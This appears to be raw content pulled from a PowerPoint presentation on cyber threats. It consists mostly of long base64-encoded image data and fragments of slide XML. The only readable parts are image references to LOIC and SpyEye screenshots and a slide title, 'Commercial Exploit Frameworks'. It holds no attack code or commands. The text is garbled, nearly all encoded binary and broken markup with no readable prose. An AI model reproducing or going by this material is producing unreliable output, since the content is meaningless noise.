JHB8jGERk2DyHH7N7C+5cWxqGMVGDSYjDJNQHC4omtY10rflZadmRm0uN49g32G+xWI0+hiZV4y2shkdUP5CTDn5XOayDMA52YbGty5W3Oy4tvQdZx3SyWPFsMpYXsMFc2Z0tg1+drW5mFr/Fu3Ldlx7/AHjo11F/YBdhCD5sVqjDBLK0AmOJ8jQdxLWlwv5Ni53JrOqBg1JiXIxcpVVTYJG2kyNaXvbdvOvezRvJ3rfdIe9Kjq8vwOS8DQ+mjwWhxJrXComrWRyOzktLeUeNjN25rUDFVWLxQuyyzRMOVz7Pkaw8m37TrOI5o6TuCiTGoWxtmdPEI5CBHIZGNY8ncGvJs6/kK4ZrGgjbieKfLoZZJJaNjsMcGvc1ga1ud1wbBrdtzu2OvvVq2KMQYBJXwyS0IpnRytYHPby7r5AWt2knm2A2mxsg6NQaYSnHK2jllYKWlo452khrMhc2Iuc6Q9HPdv8AGtr/AE3ByTZ/lEXJPdlbJyjMjnE2Aa++Um+ywK4JrAw98mJYl8nuI4aGjlnitkdJSsEBczxty81x8w+JfXp/JDNJQVDSWYY7D+TpbQGsjiqAXAxckHttJbI25dvb5Cg7nUYpFG9kb5Y2vlvybXPa10gG05Wk3dYeIL6IZQ9oexwc1wDmuBDg5p2ggjYQR0rhtZgIfPo9R1XKPY6Koa9srTBIYjZzWPY17svNsLZt2w+JdwpKZsUbYo2hrI2BjGjc1rRYAeoIPZCEIIUOCshBQNRlV0IKWUZV6IQeeVTZXQgplUPGw8FdUl3KAsrOjgEzjVx1up+q/bU+wfrSfkXYmrilO31dHl5QamoZ6XmvT6eu9r3+/wB2SVWyspXcyymVRZeiEFLIyq6EFLKwUoQQVUhWUFBW3+rqcqsFKCmX/W9FldCDzylXClCAQhCD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9" descr="data:image/jpeg;base64,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148" name="Picture 4" descr="http://i.imgur.com/g4ZG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942" y="228600"/>
            <a:ext cx="2396870" cy="394778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[Image: naamloosptv.png]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57800" y="4283358"/>
            <a:ext cx="3739025" cy="237522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http://5.mshcdn.com/wp-content/uploads/2010/12/js-loic-640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4476" y="4419600"/>
            <a:ext cx="4804724" cy="223719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http://blog.trendmicro.com/wp-content/uploads/2011/01/2011-01-21-blog-spyeye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57600" y="1322705"/>
            <a:ext cx="4171950" cy="273494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05288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2425" y="457201"/>
            <a:ext cx="8475543" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commercial Exploit Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQPEBQPDxAUFBQPEBQQDxUVFRcPFBAQFRgZFBQVFBQXHCgeGBklGhQUIC8gIycpLS0tFR4yNTArNSYrLSkBCQoKDAwOFA4PFDUkHiM1NSkwLSk1LDUuNSw1KTUpNTU2KSs1KSk1Ly8pNTUpKjUpKSstNiw1LCkrNS4sLDIpNf/AABEIALAA6wMBIgACEQEDEQH/xAAcAAACAgMBAQAAAAAAAAAAAAAACAECBQYHAwT/xABMEAABAwICBQULCAgDCQAAAAABAAIDBBEFEgYHITFxEyJBdLMINDVRYXJzgZGxshQXIyUyM1XSFVJTYnWSoeFCQ/BERVRjgqLC0eP/xAAYAQEAAwEAAAAAAAAAAAAAAAAAAQUGBP/EACYRAQAABAUEAgMAAAAAAAAAAAABBAYRQkSBgsECAxITBTEhQVH/2gAMAwEAAhEDEQA/AO4oQhAIQhAIQhAIQhBCpLuV1WTceCgcv+ea/wDsW8ft/wD5LqLdyWNnRwCZ0Ljle719zy8otN8/8fLSfp9HTa97/mMfq39uFKhSu1mQhCEAhCEAhCEAhCEAhCEAoJUrzmbcEA22GxG8bN4QXzKMy1DCYJHVNYx1XUFtJLE2IF7Tma+lY5wdzdvOeXX8dujYsJV6UVAwqaPlyK2lhD5JbDM6HI2WOYNItzw5rN32g8b2oOl3UrzjFha/9/7r0QCEIQCEIQCEIQCEIQQqybjwVlWTceCiKSyN6PUmdCWJvRwCZ0KukcWjZ1Xl93AUqFKsmLCEIQCEIQCEIQCEIQCEIQCiylCD4Y8Gia6V7WWdU25c5nc+zcgvt2c0AbLbl5TaN0743QuhaWPiZA8XIL4Y75GOcDctGZ2wn/EVk0IKtZbZ/dWQhAIQhAIQoQShVDlhcS02oaUls9bAxzftNMjS8cWAkj2IM4hai3WxhZIH6Qi2+eP6lqzmG6R01VspqmGUgXIjkbIQPKAbhBkVWTceCsFWTceCiKSyN6OATOhLE3o4BM6FXSOLRs6qy+7gKVBUZlZMWshVui6CyFW6C5BZCgFCCUKuZF0FkKpcpBQShQVGZBZCrdTdBKEIQCEIQQtc0106p8Jh5Woddz7iGJts8rh4vEBsu47Bf1L7dKdI4sOpZKuc82JuwDfI87GMb5SdiUzSfSWbEql9VUOu555ovsjZ/hYwdDR/7PSgzmmGtatxIlrpTDCTshiJY2377vtPPHZ5AtLuhCAut+1G+G4PMm7Ny0Fb/qM8NweZN2bkDRBVk3HgrBVk3HgoiksjejgEzoSxN6OATOhV0ji0bOqsvu4eNZ92/wAx3uKSUlO3V/dv8x3uKSMqyYsXRdCLIC66j3PB+tX9Uk+Ji5cuodzx4Vf1ST4mIGRCCgIQcf7pDvOl6y7syl+zJgu6R7zpesu7MpfEGe0FP1pQ/wAQpej/AJzE4jQk70E8KUH8Qpe2YnECDHaSd51HVpuzckwJToaR951HVpuzckuKCQ5Nlqm8C0XoT8bkpgTZ6pvAtF6E/G5Bt6EIQCq5WVXIF87oPSszVbMOY76OlaJJR+tO8XF/NYR/OVyIlZPSjFDV1tRUk35aeSQH90uOX/tt7FjEFmt2+5d41dajYhE2pxVhfI8BzKe5a2NpGzlbbXO/d3DyrStR+i7a3EhJI3NHRM5dwIu0y3tED67u/wChM2AgwY0GoALfo+kta33EfvyrwoNXlDT1LaunpWRSszWdGXMFnDKQWXy7j4lsqEEBVk3